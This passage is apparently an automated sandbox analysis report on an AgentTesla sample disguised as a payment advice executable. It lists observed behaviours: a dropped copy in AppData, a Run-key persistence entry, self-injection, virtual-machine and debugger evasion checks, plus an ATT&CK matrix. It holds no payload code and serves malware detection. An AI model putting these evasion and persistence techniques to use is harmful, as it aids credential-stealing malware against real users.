Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: _.pdb source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp

                      Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Unpacked PE file: 18.2.Uclldrv.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Unpacked PE file: 18.2.Uclldrv.exe.400000.0.unpack
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED2BC8 push 0040547Ch; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED63C4 push 00408CBBh; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED2BC6 push 0040547Ch; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED63C2 push 00408CBBh; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED6B9C push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED6244 push 00408C48h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC4A28 push 00404FE9h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED2A28 push 004052DCh; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED29EE push 004052A4h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED29F0 push 004052A4h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ECA1D8 push 14004056h; retn 0040h
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ECC1AC push 0040A2B5h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC5198 push 00405734h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ECC124 push 0040A1F2h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ECC122 push 0040A1F2h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC87CC push 00408D60h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC87C4 push 00408D60h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC87C2 push 00408D60h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC878C push 00408D20h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC8784 push 00408D20h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC8782 push 00408D20h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC5F60 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC4F18 push 00405734h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ED2710 push 00404FE9h; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC4EE8 push 0040547Ch; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC4EE0 push 0040547Ch; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC86DC push 00408CBBh; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC4EDE push 0040547Ch; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC86DA push 00408CBBh; ret
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03ECC6A0 push 14004056h; retn 0040h
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 0_3_03EC8EB4 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ucll
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Window / User API: threadDelayed 661
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Window / User API: threadDelayed 471
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 6140 Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 6140 Thread sleep count: 661 > 30
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -59500s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -59312s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -58906s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -58406s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -58218s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -57812s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -57312s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -56906s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -56718s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -56218s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -55812s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -55594s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -54906s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -54718s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -53812s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -53594s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -53406s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -53218s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -52718s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -52312s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -51406s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -51218s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -51000s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -50094s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -49718s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -49218s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -49000s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -48812s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -48594s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -47500s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -46812s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -46594s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124 Thread sleep time: -46218s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe TID: 2408 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe TID: 2416 Thread sleep count: 471 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe TID: 2408 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeLast function: Thread delayed
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.477856684.0000000005230000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040ADB0 GetProcessHeap,HeapFree,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCode function: 18_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Memory written: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Process created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmp | Binary or memory string: Progman
                      Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.467234236.0000000000D10000.00000002.00000001.sdmp, Uclldrv.exe, 00000012.00000002.467936207.0000000000D90000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code function: 5_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code function: 5_2_05A849A4 GetUserNameW,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.358872577.0000000000852000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.281256788.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.477031647.0000000004A10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.474318013.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.468146329.00000000021D4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.467456643.0000000002154000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.473405683.00000000035D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.477297812.0000000004F00000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Uclldrv.exe PID: 6868, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: USD67,884.08_Payment_Advise_9083008849.exe PID: 6248, type: MEMORY
                      Source: Yara match | File source: 18.2.Uclldrv.exe.25f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.Uclldrv.exe.25f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.Uclldrv.exe.4f00000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.Uclldrv.exe.4f00000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      Yara detected AgentTesla (same Yara matches as listed under Stealing of Sensitive Information above)

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 211 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 1 | Registry Run Keys / Startup Folder 1 | Process Injection 112 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Command and Scripting Interpreter 2 | Logon Script (Windows) | Registry Run Keys / Startup Folder 1 | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 124 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 21 | NTDS | Security Software Discovery 241 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | Carrier Billing Fraud |
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Virtualization/Sandbox Evasion 13 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
